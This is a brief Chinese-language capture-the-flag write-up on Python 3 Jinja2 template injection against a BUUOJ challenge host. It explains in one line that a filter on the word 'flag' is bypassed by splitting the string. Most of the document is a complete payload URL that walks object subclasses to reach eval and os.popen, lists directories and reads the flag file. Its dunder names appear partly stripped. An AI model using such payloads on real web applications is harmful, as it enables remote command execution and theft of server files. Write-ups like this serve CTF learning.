python3的模板注入
非常简单。。。就是直接执行命令就行。。虽然过滤了flag,但是拼接下就好了。。。。
payload:
http://fd5883ee-b8e2-4bf1-88af-33936a182228.node3.buuoj.cn/qaq?name={%%20for%20c%20in%20[].class.base.subclasses()%20%}{%%20if%20c.name==%27catch_warnings%27%20%}{{%20c.init.globals[%27__builtins__%27].eval(%22__import__(%27os%27).popen(%27ls%20./;ls%20./../../../;cat%20../fl%22+%22ag%27).read()%22)%20}}{%%20endif%20%}{%%20endfor%20%}